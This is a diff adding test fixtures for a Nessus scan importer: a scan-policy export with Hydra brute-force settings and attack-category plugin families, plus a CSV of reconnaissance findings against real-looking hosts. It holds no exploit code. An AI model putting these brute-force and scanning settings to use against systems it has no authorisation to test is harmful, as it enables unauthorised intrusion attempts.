+11149 +HTTP login page[checkbox]:Automated login page search +Automated login page search +checkbox +no +no + +HTTP login page +11149 +HTTP login page[entry]:Re-authenticate delay (seconds) : +Re-authenticate delay (seconds) : +entry + + + +HTTP login page +11149 +HTTP login page[entry]:Check authentication on page : +Check authentication on page : +entry + + + +HTTP login page +11149 +HTTP login page[entry]:Follow 30x redirections (# of levels) : +Follow 30x redirections (# of levels) : +entry +2 +2 + +HTTP login page +11149 +HTTP login page[entry]:Authenticated regex : +Authenticated regex : +entry + + + +HTTP login page +11149 +HTTP login page[checkbox]:Invert test (disconnected if regex matches) +Invert test (disconnected if regex matches) +checkbox +no +no + +HTTP login page +11149 +HTTP login page[checkbox]:Match regex on HTTP headers +Match regex on HTTP headers +checkbox +no +no + +HTTP login page +11149 +HTTP login page[checkbox]:Case insensitive regex +Case insensitive regex +checkbox +no +no + +HTTP login page +11149 +HTTP login page[checkbox]:Abort web application tests if login fails +Abort web application tests if login fails +checkbox +no +no + +Patch Management: IBM Tivoli Endpoint Manager Server Settings +62558 +Patch Management: IBM Tivoli Endpoint Manager Server Settings[entry]:Web Reports Server : +Web Reports Server : +entry + + + +Patch Management: IBM Tivoli Endpoint Manager Server Settings +62558 +Patch Management: IBM Tivoli Endpoint Manager Server Settings[entry]:Web Reports Port : +Web Reports Port : +entry + + + +Patch Management: IBM Tivoli Endpoint Manager Server Settings +62558 +Patch Management: IBM Tivoli Endpoint Manager Server Settings[entry]:Web Reports Username : +Web Reports Username : +entry + + + +Patch Management: IBM Tivoli Endpoint Manager Server Settings +62558 +Patch Management: IBM Tivoli Endpoint Manager Server Settings[password]:Web Reports Password : +Web Reports Password : +password + + + +Patch Management: IBM Tivoli Endpoint Manager Server Settings +62558 +Patch Management: IBM Tivoli Endpoint Manager Server Settings[checkbox]:SSL : +SSL : +checkbox +no +no + +Patch Management: IBM Tivoli Endpoint Manager Server Settings +62558 +Patch Management: IBM Tivoli Endpoint Manager Server Settings[checkbox]:Verify SSL Certificate : +Verify SSL Certificate : +checkbox +no +no + +Patch Report +66334 +Patch Report[checkbox]:Display the superseded patches in the report +Display the superseded patches in the report +checkbox +yes +yes + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[checkbox]:Always enable Hydra (slow) +Always enable Hydra (slow) +checkbox +no +no + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[file]:Logins file : +Logins file : +file + + + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[file]:Passwords file : +Passwords file : +file + + + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[entry]:Number of parallel tasks : +Number of parallel tasks : +entry +16 +16 + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[entry]:Timeout (in seconds) : +Timeout (in seconds) : +entry +30 +30 + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[checkbox]:Try empty passwords +Try empty passwords +checkbox +yes +yes + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[checkbox]:Try login as password +Try login as password +checkbox +yes +yes + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[checkbox]:Exit as soon as an account is found +Exit as soon as an account is found +checkbox +no +no + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[checkbox]:Add accounts found by other plugins to login file +Add accounts found by other plugins to login file +checkbox +yes +yes + +Wake-on-LAN +52616 +Wake-on-LAN[file]:List of MAC addresses for Wake-on-LAN: +List of MAC addresses for Wake-on-LAN: +file + + + +Wake-on-LAN +52616 +Wake-on-LAN[entry]:Time to wait (in minutes) for the systems to boot: +Time to wait (in minutes) for the systems to boot: +entry +5 +5 + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Controller : +Domain Controller : +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain : +Domain : +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Username : +Domain Username : +entry + + + +ADSI Settings +60024 +ADSI Settings[password]:Domain Password : +Domain Password : +password + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Controller 2: +Domain Controller 2: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain 2: +Domain 2: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Username 2: +Domain Username 2: +entry + + + +ADSI Settings +60024 +ADSI Settings[password]:Domain Password 2: +Domain Password 2: +password + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Controller 3: +Domain Controller 3: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain 3: +Domain 3: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Username 3: +Domain Username 3: +entry + + + +ADSI Settings +60024 +ADSI Settings[password]:Domain Password 3: +Domain Password 3: +password + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Controller 4: +Domain Controller 4: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain 4: +Domain 4: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Username 4: +Domain Username 4: +entry + + + +ADSI Settings +60024 +ADSI Settings[password]:Domain Password 4: +Domain Password 4: +password + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Controller 5: +Domain Controller 5: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain 5: +Domain 5: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Username 5: +Domain Username 5: +entry + + + +ADSI Settings +60024 +ADSI Settings[password]:Domain Password 5: +Domain Password 5: +password + + + +Hydra: PostgreSQL +18660 +Hydra: PostgreSQL[entry]:Database name (optional) : +Database name (optional) : +entry + + + +Hydra: Cisco enable +15870 +Hydra: Cisco enable[entry]:Logon password : +Logon password : +entry + + + +Database settings +33815 +Database settings[entry]:Login : +Login : +entry + + + +Database settings +33815 +Database settings[password]:Password : +Password : +password + + + +Database settings +33815 +Database settings[radio]:DB Type : +DB Type : +radio +Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL +Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL + +Database settings +33815 +Database settings[entry]:Database SID : +Database SID : +entry + + + +Database settings +33815 +Database settings[entry]:Database port to use : +Database port to use : +entry + + + +Database settings +33815 +Database settings[radio]:Oracle auth type: +Oracle auth type: +radio +NORMAL;SYSOPER;SYSDBA +NORMAL;SYSOPER;SYSDBA + +Database settings +33815 +Database settings[radio]:SQL Server auth type: +SQL Server auth type: +radio +Windows;SQL +Windows;SQL + +Service Detection +22964 +Service Detection[radio]:Test SSL based services +Test SSL based services +radio +Known SSL ports;All;None +Known SSL ports;All;None + +Kerberos configuration +17351 +Kerberos configuration[entry]:Kerberos Key Distribution Center (KDC) : +Kerberos Key Distribution Center (KDC) : +entry + + + +Kerberos configuration +17351 +Kerberos configuration[entry]:Kerberos KDC Port : +Kerberos KDC Port : +entry +88 +88 + +Kerberos configuration +17351 +Kerberos configuration[radio]:Kerberos KDC Transport : +Kerberos KDC Transport : +radio +udp;tcp +udp;tcp + +Kerberos configuration +17351 +Kerberos configuration[entry]:Kerberos Realm (SSH only) : +Kerberos Realm (SSH only) : +entry + + + +Malicious Process Detection +59275 +Malicious Process Detection[file]:Additional MD5 hashes (optional) : +Additional MD5 hashes (optional) : +file + + + +Patch Management: WSUS Server Settings +57031 +Patch Management: WSUS Server Settings[entry]:WSUS Server : +WSUS Server : +entry + + + +Patch Management: WSUS Server Settings +57031 +Patch Management: WSUS Server Settings[entry]:WSUS Port : +WSUS Port : +entry + + + +Patch Management: WSUS Server Settings +57031 +Patch Management: WSUS Server Settings[entry]:WSUS Username : +WSUS Username : +entry + + + +Patch Management: WSUS Server Settings +57031 +Patch Management: WSUS Server Settings[password]:WSUS Password : +WSUS Password : +password + + + +Patch Management: WSUS Server Settings +57031 +Patch Management: WSUS Server Settings[checkbox]:SSL : +SSL : +checkbox +no +no + +Patch Management: WSUS Server Settings +57031 +Patch Management: WSUS Server Settings[checkbox]:Verify SSL Certificate : +Verify SSL Certificate : +checkbox +no +no + +Nessus SYN scanner +11219 +Nessus SYN scanner[radio]:Firewall detection : +Firewall detection : +radio +Automatic (normal);Disabled (softer);Do not detect RST rate limitation (soft);Ignore closed ports (aggressive) +Automatic (normal);Disabled (softer);Do not detect RST rate limitation (soft);Ignore closed ports (aggressive) + +SMTP settings +11038 +SMTP settings[entry]:Third party domain : +Third party domain : +entry +example.com +example.com + +SMTP settings +11038 +SMTP settings[entry]:From address : +From address : +entry +nobody@example.com +nobody@example.com + +SMTP settings +11038 +SMTP settings[entry]:To address : +To address : +entry +postmaster@[AUTO_REPLACED_IP] +postmaster@[AUTO_REPLACED_IP] + +SMB Use Host SID to Enumerate Local Users +10860 +SMB Use Host SID to Enumerate Local Users[entry]:Start UID : +Start UID : +entry +1000 +1000 + +SMB Use Host SID to Enumerate Local Users +10860 +SMB Use Host SID to Enumerate Local Users[entry]:End UID : +End UID : +entry +1200 +1200 + +Web mirroring +10662 +Web mirroring[entry]:Number of pages to mirror : +Number of pages to mirror : +entry +1000 +1000 + +Web mirroring +10662 +Web mirroring[entry]:Maximum depth : +Maximum depth : +entry +6 +6 + +Web mirroring +10662 +Web mirroring[entry]:Start page : +Start page : +entry +/ +/ + +Web mirroring +10662 +Web mirroring[entry]:Excluded items regex : +Excluded items regex : +entry +/server_privileges\.php|logout +/server_privileges\.php|logout + +Web mirroring +10662 +Web mirroring[checkbox]:Follow dynamic pages : +Follow dynamic pages : +checkbox +no +yes + + + +MacOS X Local Security Checks +enabled + +DNS +enabled + +Gain a shell remotely +enabled + +Solaris Local Security Checks +enabled + +Port scanners +mixed + +Web Servers +enabled + +SMTP problems +enabled + +Service detection +enabled + +CGI abuses : XSS +enabled + +Debian Local Security Checks +enabled + +Databases +enabled + +Mandriva Local Security Checks +enabled + +Default Unix Accounts +enabled + +Denial of Service +enabled + +Settings +enabled + +Backdoors +enabled + +HP-UX Local Security Checks +enabled + +VMware ESX Local Security Checks +enabled + +SCADA +enabled + +General +enabled + +Red Hat Local Security Checks +enabled + +FreeBSD Local Security Checks +enabled + +CGI abuses +enabled + +Netware +enabled + +Windows : User management +enabled + +Peer-To-Peer File Sharing +enabled + +Slackware Local Security Checks +enabled + +SNMP +enabled + +Gentoo Local Security Checks +enabled + +Fedora Local Security Checks +enabled + +Misc. +enabled + +Ubuntu Local Security Checks +enabled + +FTP +enabled + +Firewalls +enabled + +Windows : Microsoft Bulletins +enabled + +SuSE Local Security Checks +enabled + +Policy Compliance +enabled + +Windows +enabled + +RPC +enabled + +Finger abuses +enabled + +CentOS Local Security Checks +enabled + +AIX Local Security Checks +enabled + +CISCO +enabled + +Junos Local Security Checks +enabled + +Mobile Devices +enabled + +Scientific Linux Local Security Checks +enabled + +Brute force attacks +enabled + + +34220 +Netstat Portscanner (WMI) +Port scanners +enabled + +14274 +Nessus SNMP Scanner +Port scanners +enabled + +14272 +netstat portscanner (SSH) +Port scanners +enabled + +10180 +Ping the remote host +Port scanners +enabled + +11219 +Nessus SYN scanner +Port scanners +enabled + + + + + +Tue Jun 25 10:39:42 2013 +0 +firewall +CISCO PIX 7.0 +12.233.108.201 +preprod.boardvantage.net +Tue Jun 25 10:32:42 2013 + + +This script displays, for each tested host, information about the scan itself : + + - The version of the plugin set + - The type of plugin feed (HomeFeed or ProfessionalFeed) + - The version of the Nessus Engine + - The port scanner(s) used + - The port range scanned + - Whether credentialed or third-party patch management checks are possible + - The date of the scan + - The duration of the scan + - The number of hosts scanned in parallel + - The number of checks done in parallel +scan_info.nasl +2013/05/31 +Nessus Scan Information +2005/08/26 +summary +None +$Revision: 1.59 $ +n/a +Information about the Nessus scan. +Information about this scan : + +Nessus version : 5.2.1 +Plugin feed version : 201306251015 +Type of plugin feed : HomeFeed (Non-commercial use only) +Scanner IP : 172.16.138.167 +Port scanner(s) : nessus_syn_scanner +Port range : default +Thorough tests : no +Experimental tests : no +Paranoia level : 1 +Report Verbosity : 1 +Safe checks : yes +Optimize the test : yes +Credentialed checks : no +Patch management checks : None +CGI scanning : enabled +Web application tests : enabled +Web app tests - Test mode : some_pairs +Web app tests - Try all HTTP methods : no +Web app tests - Maximum run time : 60 minutes. +Web app tests - Stop at first flaw : CGI +Max hosts : 80 +Max checks : 5 +Recv timeout : 5 +Backports : None +Allow post-scan editing: Yes +Scan Start Date : 2013/6/25 10:32 +Scan duration : 416 sec + + + +Based on the remote operating system, it is possible to determine what the remote system type is (eg: a printer, router, general-purpose computer, etc). +device_type.nasl +2011/05/23 +Device Type +2011/05/23 +combined +None +$Revision: 1.1 $ +n/a +It is possible to guess the remote device type. +Remote device type : firewall +Confidence level : 70 + + + +By using information obtained from a Nessus scan, this plugin reports CPE (Common Platform Enumeration) matches for various hardware and software products found on a host. + +Note that if an official CPE is not available for the product, this plugin computes the best possible CPE based on the information available from the scan. +cpe.nbin +2013/05/13 +Common Platform Enumeration (CPE) +2010/04/21 +local +None +$Revision: 1.19 $ +http://cpe.mitre.org/ +n/a +It is possible to enumerate CPE names that matched on the remote system. + +The remote operating system matched the following CPE : + + cpe:/o:cisco:pix_firewall:7.0 + + + +Using a combination of remote probes (TCP/IP, SMB, HTTP, NTP, SNMP, etc...), it is possible to guess the name of the remote operating system in use. It is also sometimes possible to guess the version of the operating system. +os_fingerprint.nasl +2013/04/01 +OS Identification +2003/12/09 +combined +None +$Revision: 2.34 $ +n/a +It is possible to guess the remote operating system. + +Remote operating system : CISCO PIX 7.0 +Confidence Level : 70 +Method : SinFP + + +The remote host is running CISCO PIX 7.0 + + +Nessus was able to resolve the FQDN of the remote host. +fqdn.nasl +2012/09/28 +Host Fully Qualified Domain Name (FQDN) Resolution +2004/02/11 +remote +None +$Revision: 1.12 $ +n/a +It was possible to resolve the name of the remote host. + +12.233.108.201 resolves as preprod.boardvantage.net. + + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 443/tcp was found to be open + + +dummy +dummy +2011/04/05 +dummy +dummy +None +$Revision: 1.14 $ +dummy +dummy +dummy + + + + diff --git a/unittests/scans/nessus/nessus_many_vuln2-all.csv b/unittests/scans/nessus/nessus_many_vuln2-all.csv new file mode 100644 index 00000000000..84c5208688f --- /dev/null +++ b/unittests/scans/nessus/nessus_many_vuln2-all.csv @@ -0,0 +1,535 @@ +Plugin ID,CVE,CVSS,Risk,Host,Protocol,Port,Name,Synopsis,Description,Solution,See Also,Plugin Output,STIG Severity,CVSS v3.0 Base Score,CVSS Temporal Score,CVSS v3.0 Temporal Score,Risk Factor,BID,XREF,MSKB,Plugin Publication Date,Plugin Modification Date,Metasploit,Core Impact,CANVAS +"10107","","","None","52.208.101.182","tcp","80","HTTP Server Type and Version","A web server is running on the remote host.","This plugin attempts to determine the type and the version of the + remote web server.","n/a","","The remote web server type is : + +Cowboy","","","","","None","","IAVT:0001-T-0931","","2000/01/04","2020/10/30","","","" +"10107","","","None","52.208.101.182","tcp","443","HTTP Server Type and Version","A web server is running on the remote host.","This plugin attempts to determine the type and the version of the + remote web server.","n/a","","The remote web server type is : + +Cowboy","","","","","None","","IAVT:0001-T-0931","","2000/01/04","2020/10/30","","","" +"10287","","","None","52.208.101.182","udp","0","Traceroute Information","It was possible to obtain traceroute information.","Makes a traceroute to the remote host.","n/a","","For your information, here is the traceroute from 192.168.1.150 to 52.208.101.182 : +192.168.1.150 +192.168.1.254 +194.149.169.240 +? +52.95.218.164 +52.93.16.70 +52.93.16.77 +? +150.222.240.32 +? + +Hop Count: 9 +","","","","","None","","","","1999/11/27","2020/08/20","","","" +"10863","","","None","52.208.101.182","tcp","443","SSL Certificate Information","This plugin displays the SSL certificate.","This plugin connects to every SSL-related port and attempts to +extract and dump the X.509 certificate.","n/a","","Subject Name: + +Country: US +State/Province: California +Locality: San Francisco +Organization: Heroku, Inc. +Common Name: *.herokuapp.com + +Issuer Name: + +Country: US +Organization: DigiCert Inc +Organization Unit: www.digicert.com +Common Name: DigiCert SHA2 High Assurance Server CA + +Serial Number: 0D 57 D1 0B 11 29 2A 3C 66 DF CD CF 3A E8 BE 65 + +Version: 3 + +Signature Algorithm: SHA-256 With RSA Encryption + +Not Valid Before: Jun 15 00:00:00 2020 GMT +Not Valid After: Jul 07 12:00:00 2021 GMT + +Public Key Info: + +Algorithm: RSA Encryption +Key Length: 2048 bits +Public Key: 00 C9 CD D6 B1 F8 39 B6 2E 63 93 47 6F EC 55 E1 55 77 D1 9F + 9D C6 99 12 71 61 56 CA 2E 32 37 CE 9E 4C E0 3D F4 0F 45 76 + E0 B4 D1 40 E0 B4 CC 1A 0C 3F EB E8 B5 5F B6 56 98 D3 29 8A + 29 AE 3E 3B 6E 0F 10 7E 4C AE A4 7D D7 DC 89 35 2D A2 FA 59 + 49 D3 14 07 B6 19 4A B1 6F 46 1E EC B2 78 E8 BA 66 92 BB 70 + F1 AE 6A D4 7E 67 98 30 8C 6C 4F A0 C1 32 B7 5B 33 31 7F 01 + 51 9A 6C 1F EF FD 48 9D B3 94 2D 29 4E 6D CF D3 A4 0E 65 B9 + 10 13 38 90 C2 D3 96 3E 3E F6 F3 96 59 50 61 C2 71 F6 FF D5 + D6 23 26 9C 54 8A C9 BC A7 D4 C0 21 99 D6 E9 48 19 E3 CE EB + EB 5D 87 14 96 05 7D 2D DB 08 79 D2 E0 9B 24 4E C4 94 83 B0 + 2E 27 3E CF C7 8E 80 00 AB 86 27 C0 A8 57 D0 35 18 70 2A D2 + 78 05 C2 98 7B 8B AB 50 22 00 31 4A C9 E2 5C 7C FD E3 F2 60 + 66 29 A3 E6 B9 F5 D1 D6 D7 53 6F 13 8E 95 D0 75 81 +Exponent: 01 00 01 + +Signature Length: 256 bytes / 2048 bits +Signature: 00 69 14 80 6F 21 BC 90 9A A7 6F 89 7C 82 31 45 00 EA 23 11 + 98 05 7A A9 9A 64 72 50 96 C2 8B 7F 1A BA 0D C3 6F 5E 6C 03 + 19 0F F1 0E 68 B5 1A 7C E3 13 9C 00 B2 39 53 6D F0 08 C5 4C + 2C 3E DD 2E 26 23 33 C3 D9 4E 35 C4 C0 59 11 DD D9 CD 42 3E + BB 33 FE 96 62 BC 64 68 FC EE 7A D0 C0 28 B6 00 6D 6B 4E 7B + 5B 8C C9 61 44 22 A9 53 D4 8E 38 60 FF 9B 0C E4 AD 40 4D 1E + 15 0E AB D5 D4 D1 16 52 53 28 63 5A D0 A2 0C E5 16 9D 73 E7 + A2 F8 13 52 8F 9D 70 72 23 D9 A1 8A 01 6E 84 EB 27 A9 AF 44 + 90 38 10 1E 60 65 D1 85 F4 ED 72 5E 1A D8 2F 37 2B C6 4E 66 + A6 2E 40 4B 74 1E 75 11 1B DD D1 D8 BA 7F 6A 62 5A F3 99 54 + 49 70 9A 2C 0E FC 88 56 4A 2A 2D 3B A6 58 9D 85 F0 DA A5 32 + 0C E7 87 48 A1 C0 5D 93 EA 18 FA 01 F7 86 C6 64 1D CE A9 BC + 58 9F 60 E4 16 26 71 15 58 13 8A FE FF 8F 38 A7 AA + +Extension: Authority Key Identifier (2.5.29.35) +Critical: 0 +Key Identifier: 51 68 FF 90 AF 02 07 75 3C CC D9 65 64 62 A2 12 B8 59 72 3B + + +Extension: Subject Key Identifier (2.5.29.14) +Critical: 0 +Subject Key Identifier: 8B F5 13 D3 FC FB 0A AD A0 AF 9F 6F C2 42 C4 D8 47 4C CB E5 + + +Extension: Subject Alternative Name (2.5.29.17) +Critical: 0 +DNS: *.herokuapp.com +DNS: herokuapp.com + + +Extension: Key Usage (2.5.29.15) +Critical: 1 +Key Usage: Digital Signature, Key Encipherment + + +Extension: Extended Key Usage (2.5.29.37) +Critical: 0 +Purpose#1: Web Server Authentication (1.3.6.1.5.5.7.3.1) +Purpose#2: Web Client Authentication (1.3.6.1.5.5.7.3.2) + + +Extension: CRL Distribution Points (2.5.29.31) +Critical: 0 +URI: http://crl3.digicert.com/sha2-ha-server-g6.crl +URI: http://crl4.digicert.com/sha2-ha-server-g6.crl + + +Extension: Policies (2.5.29.32) +Critical: 0 +Policy ID #1: 2.16.840.1.114412.1.1 +Qualifier ID #1: Certification Practice Statement (1.3.6.1.5.5.7.2.1) +CPS URI: https://www.digicert.com/CPS +Policy ID #2: 2.23.140.1.2.2 + + +Extension: Authority Information Access (1.3.6.1.5.5.7.1.1) +Critical: 0 +Method#1: Online Certificate Status Protocol +URI: http://ocsp.digicert.com +Method#2: Certificate Authority Issuers +URI: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt + + +Extension: Basic Constraints (2.5.29.19) +Critical: 1 + + +Extension: 1.3.6.1.4.1.11129.2.4.2 +Critical: 0 +Data: 04 81 F2 00 F0 00 76 00 F6 5C 94 2F D1 77 30 22 14 54 18 08 + 30 94 56 8E E3 4D 13 19 33 BF DF 0C 2F 20 0B CC 4E F1 64 E3 + 00 00 01 72 B9 14 F9 59 00 00 04 03 00 47 30 45 02 20 39 8A + E8 8C 54 92 F6 92 D9 5A F0 F1 C7 C2 DC 3D FB 3B 1B 54 EA DC + 18 6B 1C 29 40 7C BA 1A B0 E3 02 21 00 8F 79 3E 70 23 A5 78 + 4C 6C 66 2C C2 C8 4B 57 D7 5E DD 4A 7A FC 86 58 9E EC D3 C8 + F2 1D 1A 37 91 00 76 00 5C DC 43 92 FE E6 AB 45 44 B1 5E 9A + D4 56 E6 10 37 FB D5 FA 47 DC A1 73 94 B2 5E E6 F6 C7 0E CA + 00 00 01 72 B9 14 F9 77 00 00 04 03 00 47 30 45 02 21 00 B6 + 46 D0 D7 26 A0 16 70 A1 34 B1 45 30 73 B3 64 1A 9C D2 55 0A + E2 8B 15 E9 34 97 7A B1 7E E6 37 02 20 4C 3D D5 A0 04 FF FA + A3 21 43 78 82 8C 6C 8F 43 C2 92 52 8F 44 92 27 04 55 65 48 + 28 88 72 E8 27 + + +Fingerprints : + +SHA-256 Fingerprint: 82 6F E8 01 13 78 A9 2A 76 2B B6 9F 2F 8C EB 11 D2 4E 2E 4D + 9F 66 FA 71 E8 C7 88 55 FB C2 BB AB +SHA-1 Fingerprint: 94 FC F6 23 6C 37 D5 E7 92 78 3C 0B 5F AD 0C E4 9E FD 9E A8 +MD5 Fingerprint: 91 A3 72 2F ED A2 E8 69 3E EC A5 24 E8 38 F5 61 + + +PEM certificate : + +-----BEGIN CERTIFICATE----- +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 +-----END CERTIFICATE-----","","","","","None","","","","2008/05/19","2020/10/26","","","" +"11219","","","None","52.208.101.182","tcp","80","Nessus SYN scanner","It is possible to determine which TCP ports are open.","This plugin is a SYN 'half-open' port scanner. It shall be reasonably +quick even against a firewalled target. + +Note that SYN scans are less intrusive than TCP (full connect) scans +against broken services, but they might cause problems for less robust +firewalls and also leave unclosed connections on the remote target, if +the network is loaded.","Protect your target with an IP filter.","","Port 80/tcp was found to be open","","","","","None","","","","2009/02/04","2021/01/15","","","" +"11219","","","None","52.208.101.182","tcp","443","Nessus SYN scanner","It is possible to determine which TCP ports are open.","This plugin is a SYN 'half-open' port scanner. It shall be reasonably +quick even against a firewalled target. + +Note that SYN scans are less intrusive than TCP (full connect) scans +against broken services, but they might cause problems for less robust +firewalls and also leave unclosed connections on the remote target, if +the network is loaded.","Protect your target with an IP filter.","","Port 443/tcp was found to be open","","","","","None","","","","2009/02/04","2021/01/15","","","" +"11936","","","None","52.208.101.182","tcp","0","OS Identification","It is possible to guess the remote operating system.","Using a combination of remote probes (e.g., TCP/IP, SMB, HTTP, NTP, +SNMP, etc.), it is possible to guess the name of the remote operating +system in use. It is also possible sometimes to guess the version of +the operating system.","n/a",""," +Remote operating system : Microsoft Windows Server 2012 R2 +Confidence level : 56 +Method : MLSinFP + + +The remote host is running Microsoft Windows Server 2012 R2","","","","","None","","","","2003/12/09","2020/03/09","","","" +"12053","","","None","52.208.101.182","tcp","0","Host Fully Qualified Domain Name (FQDN) Resolution","It was possible to resolve the name of the remote host.","Nessus was able to resolve the fully qualified domain name (FQDN) of +the remote host.","n/a",""," +52.208.101.182 resolves as ec2-52-208-101-182.eu-west-1.compute.amazonaws.com. +","","","","","None","","","","2004/02/11","2017/04/14","","","" +"19506","","","None","52.208.101.182","tcp","0","Nessus Scan Information","This plugin displays information about the Nessus scan.","This plugin displays, for each tested host, information about the +scan itself : + + - The version of the plugin set. + - The type of scanner (Nessus or Nessus Home). + - The version of the Nessus Engine. + - The port scanner(s) used. + - The port range scanned. + - Whether credentialed or third-party patch management + checks are possible. + - Whether the display of superseded patches is enabled + - The date of the scan. + - The duration of the scan. + - The number of hosts scanned in parallel. + - The number of checks done in parallel.","n/a","","Information about this scan : + +Nessus version : 8.13.1 +Plugin feed version : 202101230522 +Scanner edition used : Nessus +Scan type : Normal +Scan policy used : Basic Network Scan +Scanner IP : 192.168.1.150 +Port scanner(s) : nessus_syn_scanner +Port range : default +Thorough tests : no +Experimental tests : no +Paranoia level : 1 +Report verbosity : 1 +Safe checks : yes +Optimize the test : yes +Credentialed checks : no +Patch management checks : None +Display superseded patches : yes (supersedence plugin launched) +CGI scanning : disabled +Web application tests : disabled +Max hosts : 30 +Max checks : 4 +Recv timeout : 5 +Backports : None +Allow post-scan editing: Yes +Scan Start Date : 2021/1/25 18:40 Romance Standard Time +Scan duration : 519 sec +","","","","","None","","","","2005/08/26","2020/08/27","","","" 